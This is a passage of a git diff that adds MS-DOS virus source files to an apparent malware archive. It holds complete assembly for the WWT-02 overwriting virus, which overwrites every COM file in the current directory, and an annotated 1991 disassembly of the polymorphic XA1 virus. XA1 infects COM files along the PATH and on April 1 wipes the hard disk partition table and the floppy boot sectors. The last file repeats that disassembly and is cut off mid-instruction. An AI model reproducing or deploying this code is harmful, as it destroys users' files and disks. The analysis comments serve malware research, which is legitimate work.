+++ b/MSDOS/Virus.MSDOS.Unknown.wwt-02.asm @@ -0,0 +1,73 @@ +; Virus name WWT-02 +; Description Attack any COM file in current directory +; Comment Don't change Date/Time, ignore ReadOnly +; Date 19 Dec 1990 15:30 +; Place CICTT +; + mov dx,offset FileMask ; FileMask for any COM file + mov ah,4eh ; Find first file + mov cx,1 ; including attrib Archive + int 21h ; Call DOS + jnc Ok ; If no error -> go on + jmp short Exit ; If error -> exit program + +Ok + call Infect ; Do infection + +DoNext + mov dx,80h ; Set DS:DX to DTA + mov ah,4fh ; Find Next file + int 21h ; Call DOS + jnc NextOk ; If no error -> go on + jmp short Exit ; If error -> exit +NextOk + jmp short Ok ; Still next file exist + +Exit + int 20h ; Exit to DOS + +Infect + mov dx,9eh ; Set DS:DX to filename in DTA + mov ax,4300h ; Get file attribute + int 21h ; Call DOS + mov Attrib,cx ; Save attribute for later + xor cx,cx ; New attribute -> normal file + mov ax,4301h ; Set attribute + int 21h ; Call DOS + mov ax,3d02h ; Open file for Read/Write + int 21h ; Call DOS + jc Exit ; If error -> exit + mov bx,ax ; Save handle + mov ax,5700h ; Get file Date/Time + int 21h ; Call DOS + mov Date,dx ; Save date + mov Time,cx ; Save time + mov dx,100h ; DS:DX point to itself + mov ah,40h ; Write to handle + mov cx,offset VirusSize-100h ; Write only virus + int 21h ; Call DOS + mov ax,5701h ; Restore Date/Time + mov cx,Time ; Old time + mov dx,Date ; Old time + int 21h ; Call DOS + mov ah,3eh ; Close file + int 21h ; Call DOS + mov dx,9eh ; Set DS:DX to filename in DTA + mov cx,Attrib ; Restore attribute + mov ax,4301h ; Set file attribute + int 21h ; Call DOS + ret ; Return to caller + + +FileMask + db '*.COM',0 ; File mask for any COM file +Date + dw ? +Time + dw ? +Attrib + dw ? +VirusSize + db ? ; Used to calculate virus + ; size + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.xa1.asm b/MSDOS/Virus.MSDOS.Unknown.xa1.asm new file mode 100644 index 00000000..ac2e8aed --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.xa1.asm @@ -0,0 +1,909 @@ +;============================================== +; Virus XA1 isolated in Poland in June 1991 +; +; disassembled by Andrzej Kadlof July 1991 +; +; (C) Polish Section of Virus Information Bank +;============================================== + +; virus entry point + +0100 EB07 jmp 0109 + +0102 56 0A 03 59 00 ; first 7 bytes forms virus signature +0107 2A 00 ; generation counter, never used (?) + +; prepare stack for tricks +; stack usage: +; [BP + 2] cleared but not used +; [BP + 0] offset in block +; [BP - 2] low byte of size of decrypted part and encryption key + +0109 0E push cs ; make free space on stack +010A E80000 call 010D ; put current offset on the stack +010D FA cli ; disable interrupt to safe stack +010E 8BEC mov bp,sp +0110 58 pop ax +0111 32C0 xor al,al +0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? +0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt + +; encrypt virus code, this routine is changed in different virus copies + +011B B9CE05 mov cx,05CE ; length of decrypted block +011E B08C mov al,8C ; 8C is changed! +0120 8846FF mov [bp-01],al +0123 8B5E00 mov bx,[bp] ; current position in block +; ^^ changed, possible 3 wariants: +; ..5E.. mov bx,[bp] versions 0, 1, 2 +; ..76.. mov si,[bp] versions 3, 4, 5 +; ..7E.. mov di,[bp] versions 6, 7, 8 + +0126 884EFE mov [bp-02],cl ; low byte of counter +0129 8A4EFF mov cl,[bp-01] ; encrypt key +012C D207 rol byte ptr [bx],cl ; byte manipulation +; ^^^^ changed, possible 9 wariants: +; 000F add byte ptr [bx],cl version 0 +; 300F xor byte ptr [bx],cl version 1 +; D2O7 rol byte ptr [bx],cl version 2 +; 000C add byte ptr [si],cl version 3 +; 300C xor byte ptr [si],cl version 4 +; D204 rol byte ptr [si],cl version 5 +; 000D add byte ptr [di],cl version 6 +; 300D xor byte ptr [di],cl version 7 +; D205 rol byte ptr [di],cl version 8 + +012E EB00 jmp 0130 ; short pause +0130 43 inc bx ; position in block +; ^^ changed, possible 3 wariants: +; 43 inc bx version 0, 1, 2 +; 46 inc si version 3, 4, 5 +; 47 inc di version 6, 7, 8 + +0131 8A4EFE mov cl,[bp-02] ; restore block size +0134 E2F0 loop 0126 ; offset is decrypted! + +; encrypted part + +0136 FB sti + +; get address of curent DTA and store it on the stack + +0137 B42F mov ah,2F +0139 CD21 int 21 +013B 06 push es +013C 53 push bx + +; get keyboard status bits + +013D 33C0 xor ax,ax +013F 8ED8 mov ds,ax +0141 A01704 mov al,[0417] +0144 2410 and al,10 ; extract scroll lock state +0146 50 push ax ; store +0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag + +; restore DS + +014C 8CC8 mov ax,cs +014E 8ED8 mov ds,ax + +; intercepte INT 24h + +0150 BAC606 mov dx,06C6 +0153 B82425 mov ax,2524 ; set interrupt vector +0156 CD21 int 21 + +; search for PATH= in environment block + +0158 A12C00 mov ax,[002C] ; segment of environment block +015B 8EC0 mov es,ax +015D 33FF xor di,di ; begin of environment block +015F FC cld + +0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker +0164 741D je 0183 ; end fo block + +0166 BE1B05 mov si,051B ; offset of string 'PATH=' +0169 B90500 mov cx,0005 ; length of string +016C 8BC7 mov ax,di ; starting address +016E F3A6 rep cmpsb ; compare +0170 7411 je 0183 ; found + +0172 8BF8 mov di,ax ; last starting point +0174 32C0 xor al,al +0176 B5FF mov ch,FF ; maximum block size +0178 F2AE repnz scasb +017A 74E4 je 0160 + +017C BF1A05 mov di,051A ; end of buffer for path +017F 8CC8 mov ax,cs ; restore ES +0181 8EC0 mov es,ax +0183 C706C1056205 mov word ptr [05C1],0562 + +; set local DTA + +0189 BA3605 mov dx,0536 +018C B41A mov ah,1A ; set DTA +018E CD21 int 21 + +0190 A1F906 mov ax,[06F9] +0193 A3F706 mov [06F7],ax +0196 A1FD06 mov ax,[06FD] +0199 A3FB06 mov [06FB],ax +019C B90500 mov cx,0005 ; counter of potential victims +019F BA1505 mov dx,0515 ; '*.COM', 0 +01A2 06 push es +01A3 57 push di +01A4 51 push cx + +01A5 8CC8 mov ax,cs +01A7 8EC0 mov es,ax +01A9 B9FFFF mov cx,FFFF ; all possible attributes +01AC B44E mov ah,4E ; find first +01AE EB06 jmp 01B6 + +01B0 59 pop cx ; restore counter +01B1 E35B jcxz 020E ; limit reached, check show/destruction + +01B3 B44F mov ah,4F ; find next +01B5 51 push cx ; store counter + +01B6 CD21 int 21 +01B8 7203 jb 01BD ; continue + +01BA E9F100 jmp 02AE + +; restore address of path in environment block + +01BD 59 pop cx +01BE 5F pop di +01BF 07 pop es + +01C0 26803D00 cmp es:byte ptr [di],00 ; end of block? +01C4 744A je 0210 ; yes + +; copy path to buffer + +01C6 BB6205 mov bx,0562 ; offset of buffer + +01C9 268A05 mov al,es:[di] ; next character +01CC 0AC0 or al,al ; end of block? +01CE 740A je 01DA ; yes + +01D0 47 inc di +01D1 3C3B cmp al,3B ; ';', end of path? +01D3 7405 je 01DA ; yes + +01D5 8807 mov [bx],al ; copy character +01D7 43 inc bx ; increase pointer +01D8 EBEF jmp 01C9 ; get next character + +01DA 81FB6205 cmp bx,0562 ; buffer not empty? +01DE 74E0 je 01C0 ; empty + +01E0 8A47FF mov al,[bx-01] +01E3 3C3A cmp al,3A ; ':', root directory +01E5 7408 je 01EF ; yes + +01E7 3C5C cmp al,5C ; check last character, '\' +01E9 7404 je 01EF ; there is + +01EB C6075C mov byte ptr [bx],5C ; add '\' +01EE 43 inc bx ; pointer to last character +01EF 06 push es +01F0 57 push di +01F1 51 push cx +01F2 891EC105 mov [05C1],bx ; store it +01F6 8BF3 mov si,bx +01F8 81EB6205 sub bx,0562 ; find path length +01FC 8BCB mov cx,bx +01FE BF1405 mov di,0514 ; destination buffer +0201 8CC8 mov ax,cs ; restore ES +0203 8EC0 mov es,ax +0205 4E dec si +0206 FD std +0207 F3A4 rep movsb ; copy +0209 8BD7 mov dx,di +020B 42 inc dx +020C EB97 jmp 01A5 ; find first + +; end of infection proces, check condition for destruction/show + +020E 58 pop ax ; balance stack +020F 58 pop ax + +0210 8CC8 mov ax,cs ; restore ES +0212 8EC0 mov es,ax + +; get date + +0214 B42A mov ah,2A ; get date +0216 CD21 int 21 + +0218 81FA0104 cmp dx,0401 ; April 1? +021C 7533 jne 0251 ; no + +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> +; +; DESTRUCTION OF HARD DISK AND FLOPPIES IN A: AND B: +; +;<><><><><><><><><><><><><><><><><><><><><><><><><><><><> + +; copy partition table to sector 11h of side 0, track 0 + +021E BA8000 mov dx,0080 ; first hard drive +0221 B90100 mov cx,0001 ; track 0 sector 1 (partition table) +0224 BB0307 mov bx,0703 ; destroy victim code +0227 B80102 mov ax,0201 ; read 1 sector +022A 52 push dx +022B 51 push cx +022C 53 push bx +022D CD13 int 13 ; disk I/O +022F 5B pop bx +0230 59 pop cx +0231 5A pop dx +0232 B111 mov cl,11 ; new place for partition table +0234 B80103 mov ax,0301 ; write partition table +0237 CD13 int 13 + +; set and of sector marker in the buffer + +0239 C706350855AA mov word ptr [0835],AA55 ; end of sector marker + +; overwrite partition table + +023F B280 mov dl,80 +0241 E87404 call 06B8 ; write one sector to disk + +; overwrite boot sector of drive A: + +0244 32D2 xor dl,dl +0246 E86F04 call 06B8 ; write one sector do disk + +; overwrite boot sector of drive B: + +0249 B201 mov dl,01 +024B E86A04 call 06B8 ; write disk + +024E EB0A jmp 025A +0250 90 nop + +; compare date + +0251 81FA180C cmp dx,0C18 ; december 24? +0255 7203 jb 025A ; date earlier + +;<><><><<><><><><><><><><><><><><><><><> +; +; CHRISTMAS SHOW +; +; see the description of subroutine 05D7 +;<><><><><><><><><><><><><><><><><><><><><> + +0257 E87D03 call 05D7 ; drow christmas tree + +; make sound + +025A E440 in al,40 +025C 3CF8 cmp al,F8 +025E 7206 jb 0266 + +0260 E461 in al,61 +0262 0C03 or al,03 +0264 E661 out 61,al + +; restore the state of scroll lock flag + +0266 33C0 xor ax,ax +0268 8ED8 mov ds,ax +026A 58 pop ax +026B 08061704 or [0417],al + +; restore INT 24h + +026F 2E8E1E1400 mov ds,cs:[0014] ; segment of INT 24h in PSP +0274 2E8B161200 mov dx,cs:[0012] ; offset of INT 24h in PSP +0279 B82425 mov ax,2524 ; set interrupt vector +027C CD21 int 21 + +; restore DTA + +027E 5A pop dx +027F 1F pop ds +0280 B41A mov ah,1A ; set DTA +0282 CD21 int 21 + +; restore DS + +0284 8CC8 mov ax,cs +0286 8ED8 mov ds,ax + +0288 BEF006 mov si,06F0 +028B 8B3EF706 mov di,[06F7] +028F 033EFB06 add di,[06FB] +0293 57 push di +0294 B90700 mov cx,0007 +0297 FC cld +0298 F3A4 rep movsb +029A 33C0 xor ax,ax +029C 8BD8 mov bx,ax +029E 8BD0 mov dx,ax +02A0 8BE8 mov bp,ax + +02A2 8B36F706 mov si,[06F7] +02A6 BF0001 mov di,0100 +02A9 8B0EFB06 mov cx,[06FB] +02AD C3 ret + +02AE BE5405 mov si,0554 ; file name in FCB +02B1 8B3EC105 mov di,[05C1] ; address of destination +02B5 B90D00 mov cx,000D ; length of asciiz string +02B8 FC cld +02B9 F3A4 rep movsb ; copy +02BB BF2005 mov di,0520 ; buffer for file name +02BE E8FA01 call 04BB ; copy +02C1 7503 jne 02C6 + +02C3 E9EAFE jmp 01B0 ; find next/destruct/show + +02C6 BF2B05 mov di,052B +02C9 E8EF01 call 04BB ; copy file name +02CC 7503 jne 02D1 + +02CE E9DFFE jmp 01B0 ; find next/destruct/show + +02D1 C606610500 mov byte ptr [0561],00 +02D6 90 nop +02D7 F6064B0507 test byte ptr [054B],07 ; attribute byte in DTA +02DC 740F je 02ED ; hiden, system or read only, open file + +02DE BA6205 mov dx,0562 ; file name +02E1 33C9 xor cx,cx ; clear all attributes +02E3 B80143 mov ax,4301 ; set file attributes +02E6 CD21 int 21 +02E8 7303 jnb 02ED ; open file + +02EA E9C3FE jmp 01B0 ; find next/destruct/show + +02ED BA6205 mov dx,0562 +02F0 B8023D mov ax,3D02 ; open file for read/write +02F3 CD21 int 21 + +02F5 8BD8 mov bx,ax ; handle +02F7 7303 jnb 02FC + +02F9 E9B4FE jmp 01B0 ; find next + +; check file size + +02FC A15205 mov ax,[0552] ; high word of file size in DTA +02FF 0BC0 or ax,ax +0301 7403 je 0306 ; file below 64K + +0303 E99001 jmp 0496 ; close file and find next + +0306 A15005 mov ax,[0550] ; lower word of file size +0309 3D0700 cmp ax,0007 ; minimum file size +030C 72F5 jb 0303 ; close file and find next + +030E 3D00F8 cmp ax,F800 ; maximum file size +0311 73F0 jnb 0303 ; close file and find next + +; mayby already infected? + +0313 8B16F706 mov dx,[06F7] ; form address of bufer +0317 0316FB06 add dx,[06FB] +031B B90700 mov cx,0007 ; number of bytes +031E 52 push dx +031F 51 push cx +0320 B43F mov ah,3F ; read file +0322 CD21 int 21 + +0324 59 pop cx +0325 5E pop si +0326 7208 jb 0330 ; read error, close and find next + +; compare first 7 bytes with own code + +0328 BF0001 mov di,0100 ; destination +032B FC cld +032C F3A6 rep cmpsb +032E 7503 jne 0333 + +0330 E96301 jmp 0496 ; close file and find next, (infected!) + +; get and store file date and time + +0333 B80057 mov ax,5700 ; get file time stamp +0336 CD21 int 21 +0338 72F6 jb 0330 ; close file, find next + +033A 89160107 mov [0701],dx ; store date +033E 890EFF06 mov [06FF],cx ; store time +0342 C606610501 mov byte ptr [0561],01 +0347 90 nop + +; check file size, if less than 603h bytes then append some garbage + +0348 A15005 mov ax,[0550] ; file size +034B 3D0306 cmp ax,0603 +034E 7321 jnb 0371 + +; file length is less than 603h, add some garbage + +0350 33D2 xor dx,dx +0352 33C9 xor cx,cx +0354 B80242 mov ax,4202 ; move file ptr to EOF +0357 CD21 int 21 +0359 7303 jnb 035E ; no errors, continue + +035B E93801 jmp 0496 ; close file and find next + +035E B90306 mov cx,0603 ; number of bytes +0361 2B0E5005 sub cx,[0550] ; file size +0365 B440 mov ah,40 ; write file +0367 CD21 int 21 +0369 B80306 mov ax,0603 ; new file size +036C 7303 jnb 0371 + +036E E92501 jmp 0496 ; close file and find next + +; now file is at least 603h bytes long + +0371 FEC4 inc ah +0373 A3F906 mov [06F9],ax ; oryginal file size + 256 +0376 A15005 mov ax,[0550] ; file size +0379 BE0306 mov si,0603 ; virus length +037C 33FF xor di,di +037E 3BC6 cmp ax,si +0380 7302 jnb 0384 + +0382 8BF0 mov si,ax + +0384 8936FD06 mov [06FD],si + +0388 8BD7 mov dx,di +038A 33C9 xor cx,cx +038C B80042 mov ax,4200 ; move file ptr to BOF +038F CD21 int 21 +0391 7303 jnb 0396 + +0393 E90001 jmp 0496 ; close file and find next + +0396 8B16F706 mov dx,[06F7] +039A 0316FB06 add dx,[06FB] +039E B90002 mov cx,0200 +03A1 3BF1 cmp si,cx +03A3 7302 jnb 03A7 + +03A5 8BCE mov cx,si ; number of bytes + +03A7 52 push dx +03A8 51 push cx +03A9 B43F mov ah,3F ; read file +03AB CD21 int 21 +03AD 59 pop cx +03AE 5A pop dx +03AF 7303 jnb 03B4 ; continue + +03B1 E9E200 jmp 0496 ; close file and find next + +03B4 52 push dx +03B5 51 push cx +03B6 33D2 xor dx,dx +03B8 33C9 xor cx,cx +03BA B80242 mov ax,4202 ; move file ptr to EOF +03BD CD21 int 21 +03BF 59 pop cx +03C0 5A pop dx +03C1 7303 jnb 03C6 ; continue + +03C3 E9D000 jmp 0496 ; close file and find next + +03C6 B440 mov ah,40 ; write file +03C8 CD21 int 21 +03CA 7303 jnb 03CF + +03CC E9C700 jmp 0496 ; close file and find next + +03CF 81C70002 add di,0200 +03D3 81EE0002 sub si,0200 +03D7 7602 jbe 03DB + +03D9 EBAD jmp 0388 + +03DB FF060701 inc word ptr [0107] ; infection counter +03DF 33D2 xor dx,dx +03E1 33C9 xor cx,cx +03E3 B80042 mov ax,4200 ; move file ptr to BOF +03E6 CD21 int 21 +03E8 7303 jnb 03ED + +03EA E9A900 jmp 0496 ; close file and find next + +03ED 53 push bx ; store handle +03EE E440 in al,40 +03F0 A807 test al,07 +03F2 74FA je 03EE + +03F4 A21F01 mov [011F],al ; change decryption key + +; get random number from system timer count + +03F7 33C0 xor ax,ax +03F9 8AF8 mov bh,al +03FB 8ED8 mov ds,ax +03FD A06C04 mov al,[046C] ; timer, low byte + +0400 8CCA mov dx,cs ; restore DS +0402 8EDA mov ds,dx + +; generate rundom number in BX in the range 0..8 + +0404 B103 mov cl,03 +0406 F6F1 div cl ; AL <- AL/3, AH <- remainder +0408 8AEC mov ch,ah ; store remainder (0, 1 or 2) +040A 32E4 xor ah,ah ; prepare division +040C F6F1 div cl ; AL <- AL / 9, AH <- remainder +040E 8AC4 mov al,ah ; AL <- second remainder +0410 02C0 add al,al ; *2, AL in [0..4] +0412 02C4 add al,ah ; *3, AL in [0..6] +0414 02C5 add al,ch ; first remainder +0416 8AD8 mov bl,al ; BL in [0..8] + +; multiply BX by 4 (table entry size) + +0418 03DB add bx,bx +041A 03DB add bx,bx +041C 81C3C906 add bx,06C9 ; offset of table + +; modify encryption routine (automodyfication) + +0420 8A07 mov al,[bx] +0422 A22401 mov [0124],al ; 3 versions 5E/76/7E +0425 8B4701 mov ax,[bx+01] +0428 A32C01 mov [012C],ax ; 9 wersions +042B 8A4703 mov al,[bx+03] ; 3 versions +042E A23001 mov [0130],al +0431 8AC5 mov al,ch + +; prepare decrypt routine + +0433 BBED06 mov bx,06ED +0436 D7 xlat +0437 A26104 mov [0461],al ; modify decryption routine + +; write new encryption routine to file + +043A 5B pop bx ; restore handle +043B BA0001 mov dx,0100 ; begin of file +043E B93500 mov cx,0035 ; block size +0441 B440 mov ah,40 ; write file +0443 CD21 int 21 +0445 724F jb 0496 ; close file and find next + +; decryption routine + +0447 BE3501 mov si,0135 ; start of decrypted block +044A B9CE05 mov cx,05CE ; size of decrypted block +044D 53 push bx ; store handle +044E 51 push cx +044F B80002 mov ax,0200 +0452 8B1EF706 mov bx,[06F7] +0456 031EFB06 add bx,[06FB] +045A 53 push bx +045B 8A0E1F01 mov cl,[011F] ; decription key + +045F 8A2C mov ch,[si] +0461 D2CD ror ch,cl ; <-- changed (3 variants) + +; ^^ changed byte, possible wariants: +; 28CD sub ch,cl versions: 0, 3, 6 +; 30CD xor ch,cl versions: 1, 4, 7 +; D2CD ror ch,cl versions: 2, 5, 8 + +0463 882F mov [bx],ch +0465 43 inc bx +0466 46 inc si +0467 48 dec ax +0468 75F5 jne 045F + +046A 5A pop dx +046B 59 pop cx +046C 5B pop bx +046D 51 push cx +046E 81F90102 cmp cx,0201 +0472 7203 jb 0477 + +0474 B90002 mov cx,0200 +0477 B440 mov ah,40 ; write file +0479 CD21 int 21 +047B 59 pop cx +047C 7218 jb 0496 ; close file and find next + +047E 81E90002 sub cx,0200 +0482 77C9 ja 044D + +; restore file time stamp + +0484 8B160107 mov dx,[0701] ; file date +0488 8B0EFF06 mov cx,[06FF] ; file time +048C B80157 mov ax,5701 ; set file time stamp +048F CD21 int 21 +0491 7203 jb 0496 ; close file and find next + +; decrease counter on the stack + +0493 59 pop cx +0494 49 dec cx +0495 51 push cx + +0496 B43E mov ah,3E ; close file +0498 CD21 int 21 +049A 8A0E4B05 mov cl,[054B] ; attributes +049E FE0E6105 dec byte ptr [0561] +04A2 7405 je 04A9 + +04A4 F6C107 test cl,07 ; hidden, system, read only +04A7 740F je 04B8 + +04A9 80F920 cmp cl,20 ; archive +04AC 740A je 04B8 + +04AE BA6205 mov dx,0562 ; file name +04B1 32ED xor ch,ch +04B3 B80143 mov ax,4301 ; set file attributes +04B6 CD21 int 21 +04B8 E9F5FC jmp 01B0 ; find next + +;---------------------------------------- +; move 11 bytes do DS:DI ('C:\COMMAND.') + +04BB BE6205 mov si,0562 +04BE B90B00 mov cx,000B +04C1 FC cld +04C2 F3A6 rep cmpsb +04C4 C3 ret + +; buffer for path + +04C5 30 31 32 33 34 35 36 37 01234567 +04CD 38 39 30 31 32 33 34 35 89012345 +04D5 36 37 38 39 30 31 32 33 67890123 +04DD 34 35 36 37 38 39 30 31 45678901 +04E5 32 33 34 35 36 37 38 39 23456789 +04ED 30 31 32 33 34 35 36 37 01234567 +04F5 38 39 30 31 32 33 34 35 89012345 +04FD 36 37 38 43 3A 5C 4A 45 678C:\JE +0505 5A 59 4B 49 43 3A 5C 50 ZYKIC:\P +050D 43 44 3A 5C 55 43 3A 5C CD:\UC:\ + +; paterns for search + +0515 2A 2E 43 4F 4D 00 50 41 *.COM PA +051D 54 48 3D TH= + +; buffers for file names + +0520 49 42 4D 42 49 IBMBI +0525 4F 2E 43 4F 4D 00 O.COM + +052B 49 42 IB +052D 4D 44 4F 53 2E 43 4F 4D MDOS.COM +0535 00 + +; local DTA + +0536 03 3F 3F 3F 3F 3F 3F ;\ +053D 3F 3F 43 4F 4D FF 02 00 ; | reserved +0545 00 00 00 00 00 00 ;/ +054B 20 ; file attribute +054C 00 60 71 0E ; file time stamp +0550 DB 62 00 00 ; file size +0554 43 4F 4D 4D 41 4E 44 2E 43 4F 4D 00 00 ; file name (COMMAND.COM, 0, 0) + +0561 01 ; flag: attributes are changed + +0562 43 3A 5C C:\ +0565 43 4F 4D 4D 41 4E 44 2E COMMAND. +056D 43 4F 4D 00 00 4D 00 00 COM M +0575 00 2E 43 4F 4D 00 4F 68 .COM Oh +057D 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +0585 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +058D 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +0595 68 4E 6F 21 4F 68 4E 6F hNo!OhNo +059D 21 4F 68 4E 6F 21 4F 68 !OhNo!Oh +05A5 4E 6F 21 4F 68 4E 6F 21 No!OhNo! +05AD 4F 68 4E 6F 21 4F 68 4E OhNo!OhN +05B5 6F 21 4F 68 4E 6F 21 4F o!OhNo!O +05BD 68 4E 6F 21 hNo! + +05C1 65 05 ; + +;--------------------------------------- +; write character (or space) cx times + +05C3 B020 mov al,20 + +05C5 50 push ax +05C6 E89E00 call 0667 ; write character +05C9 58 pop ax +05CA E2F9 loop 05C5 +05CC C3 ret + +;------------- +; next line + +05CD B00D mov al,0D +05CF E89500 call 0667 ; write character +05D2 B00A mov al,0A +05D4 E99000 jmp 0667 ; write character + +;------------------------------ +; drow christmast tree +; +; result will look like this: +; +; +; +; *** +; ***** +; ******* +; ********* +; *********** +; ************* +; *************** +; ***************** +; ******************* +; ********************* +; *********************** +; ************************* +; *************************** +; ***************************** +; +; +; +; +; Und er lebt doch noch : Der Tannenbaum ! +; Frohe Weihnachten ... +; + +05D7 B92700 mov cx,0027 +05DA E8E6FF call 05C3 ; clear 39 characters +05DD B0AD mov al,AD ; '' +05DF E88500 call 0667 ; write character +05E2 E8E8FF call 05CD ; new line +05E5 BB0300 mov bx,0003 +05E8 BA2600 mov dx,0026 + +05EB 8BCA mov cx,dx +05ED E8D3FF call 05C3 ; write CX spaces +05F0 8BCB mov cx,bx +05F2 B02A mov al,2A ; '*' +05F4 E8CEFF call 05C5 ; write CX characters +05F7 E8D3FF call 05CD ; new line +05FA 4A dec dx +05FB 83C302 add bx,0002 +05FE 83FB1F cmp bx,001F +0601 75E8 jne 05EB + +0603 BB0300 mov bx,0003 +0606 B92600 mov cx,0026 +0609 E8B7FF call 05C3 ; write CX spaces +060C B90300 mov cx,0003 +060F B0DB mov al,DB ; '' +0611 E8B1FF call 05C5 ; write CX characters +0614 E8B6FF call 05CD ; next line +0617 4B dec bx +0618 75EC jne 0606 + +061A B95000 mov cx,0050 ; full line +061D B0CD mov al,CD ; '' +061F E8A3FF call 05C5 ; write character CX times +0622 B91300 mov cx,0013 +0625 E89BFF call 05C3 ; write CX spaces +0628 BB7406 mov bx,0674 ; string: Und er lebt doch ... +062B E82C00 call 065A ; write string +062E B91D00 mov cx,001D +0631 E88FFF call 05C3 ; clear part of line +0634 EB24 jmp 065A ; write asciiz string pointed by BX +0636 90 nop + +0637 E80000 call 063A + +063A 5B pop bx +063B 83C30D add bx,000D +063E 8CC8 mov ax,cs +0640 8ED8 mov ds,ax +0642 E81500 call 065A ; write string +0645 EBFE jmp 0645 ; hang CPU + +0647 41 70 72 69 6C 2C 20 41 April, A +064F 70 72 69 6C 20 2E 2E 2E pril ... +0657 20 07 00 + +;----------------------------------- +; write asciiz string pointed by BX + +065A 8A07 mov al,[bx] ; get character +065C 43 inc bx ; next character +065D 0AC0 or al,al ; and of string? +065F 7405 je 0666 ; yes, RET + +0661 E80300 call 0667 ; write character +0664 EBF4 jmp 065A ; get next character +0666 C3 ret + +;-------------------- +; write character TTL + +0667 52 push dx +0668 51 push cx +0669 53 push bx +066A 32FF xor bh,bh +066C B40E mov ah,0E +066E CD10 int 10 +0670 5B pop bx +0671 59 pop cx +0671 59 pop cx +0672 5A pop dx +0673 C3 ret + +0674 55 6E 64 20 65 72 20 6C Und er l +067C 65 62 74 20 64 6F 63 68 ebt doch +0684 20 6E 6F 63 68 20 3A 20 noch : +068C 44 65 72 20 54 61 6E 6E Der Tann +0694 65 6E 62 61 75 6D 20 21 enbaum ! +069C 0D 0A 00 46 72 6F 68 65 Frohe +06A4 20 57 65 69 68 6E 61 63 Weihnac +06AC 68 74 65 6E 20 2E 2E 2E hten ... +06B4 0D 0A 07 00 + +;------------------------------------------ +; write one sector to disk specified in DL +; track 9, side 0 sector 1 + +06B8 32F6 xor dh,dh +06BA B90100 mov cx,0001 +06BD BB3706 mov bx,0637 +06C0 B80103 mov ax,0301 +06C3 CD13 int 13 +06C5 C3 ret + +;================== +; INT 24h handler + +06C6 B000 mov al,00 +06C8 CF iret + +; table of bytes for changing encrypt routine + +06C9 5E 00 0F 43 +06CD 5E 30 0F 43 +06D1 5E D2 07 43 +06D5 76 00 0C 46 +06D9 76 30 0C 46 +06DD 76 D2 04 46 +06E1 7E 00 0D 47 +06E5 7E 30 0D 47 +06E9 7E D2 05 47 + +; table for variants of decrypt routine + +06ED 28 30 D2 + +; part of victime code + +06F0 F3A4 rep movsb +06F2 8BF1 mov si,cx +06F4 8BF9 mov di,cx +06F6 C3 ret + +06F7 0307 ; offset of buffer/modified code +06F9 DB63 ; file size + 256 +06FB C603 ; +06FD 0306 ; +06FF 0060 ; file date +0701 710E ; file time + diff --git a/MSDOS/Virus.MSDOS.Unknown.xa1.lst b/MSDOS/Virus.MSDOS.Unknown.xa1.lst new file mode 100644 index 00000000..ac2e8aed --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.xa1.lst @@ -0,0 +1,909 @@ +;============================================== +; Virus XA1 isolated in Poland in June 1991 +; +; disassembled by Andrzej Kadlof July 1991 +; +; (C) Polish Section of Virus Information Bank +;============================================== + +; virus entry point + +0100 EB07 jmp 0109 + +0102 56 0A 03 59 00 ; first 7 bytes forms virus signature +0107 2A 00 ; generation counter, never used (?) + +; prepare stack for tricks +; stack usage: +; [BP + 2] cleared but not used +; [BP + 0] offset in block +; [BP - 2] low byte of size of decrypted part and encryption key + +0109 0E push cs ; make free space on stack +010A E80000 call 010D ; put current offset on the stack +010D FA cli ; disable interrupt to safe stack +010E 8BEC mov bp,sp +0110 58 pop ax +0111 32C0 xor al,al +0113 894602 mov [bp+02],ax ; corrupt debbuger return address ?? +0116 8146002800 add word ptr [bp],0028 ; offset of first byte to encrypt + +; encrypt virus code, this routine is changed in different virus copies + +011B B9CE05 mov cx,05CE ; length of decrypted block +011E B08C mov al,8C ; 8C is changed! +0120 8846FF mov [bp-01],al +0123 8B5E00 mov bx,[bp] ; current position in block +; ^^ changed, possible 3 wariants: +; ..5E.. mov bx,[bp] versions 0, 1, 2 +; ..76.. mov si,[bp] versions 3, 4, 5 +; ..7E.. mov di,[bp] versions 6, 7, 8 + +0126 884EFE mov [bp-02],cl ; low byte of counter +0129 8A4EFF mov cl,[bp-01] ; encrypt key +012C D207 rol byte ptr [bx],cl ; byte manipulation +; ^^^^ changed, possible 9 wariants: +; 000F add byte ptr [bx],cl version 0 +; 300F xor byte ptr [bx],cl version 1 +; D2O7 rol byte ptr [bx],cl version 2 +; 000C add byte ptr [si],cl version 3 +; 300C xor byte ptr [si],cl version 4 +; D204 rol byte ptr [si],cl version 5 +; 000D add byte ptr [di],cl version 6 +; 300D xor byte ptr [di],cl version 7 +; D205 rol byte ptr [di],cl version 8 + +012E EB00 jmp 0130 ; short pause +0130 43 inc bx ; position in block +; ^^ changed, possible 3 wariants: +; 43 inc bx version 0, 1, 2 +; 46 inc si version 3, 4, 5 +; 47 inc di version 6, 7, 8 + +0131 8A4EFE mov cl,[bp-02] ; restore block size +0134 E2F0 loop 0126 ; offset is decrypted! + +; encrypted part + +0136 FB sti + +; get address of curent DTA and store it on the stack + +0137 B42F mov ah,2F +0139 CD21 int 21 +013B 06 push es +013C 53 push bx + +; get keyboard status bits + +013D 33C0 xor ax,ax +013F 8ED8 mov ds,ax +0141 A01704 mov al,[0417] +0144 2410 and al,10 ; extract scroll lock state +0146 50 push ax ; store +0147 80261704EF and byte ptr [0417],EF ; clear scroll lock flag + +; restore DS + +014C 8CC8 mov ax,cs +014E 8ED8 mov ds,ax + +; intercepte INT 24h + +0150 BAC606 mov dx,06C6 +0153 B82425 mov ax,2524 ; set interrupt vector +0156 CD21 int 21 + +; search for PATH= in environment block + +0158 A12C00 mov ax,[002C] ; segment of environment block +015B 8EC0 mov es,ax +015D 33FF xor di,di ; begin of environment block +015F FC cld + +0160 26803D00 cmp es:byte ptr [di],00 ; end of block marker +0164 741D je 0183 ; end fo block + +0166 BE1B05 mov si,051B ; offset of string 'PATH=' +0169 B90500 mov cx,0005 ; length of string +016C 8BC7 mov ax,di ; starting address +016E F3A6 rep cmpsb ; compare +0170 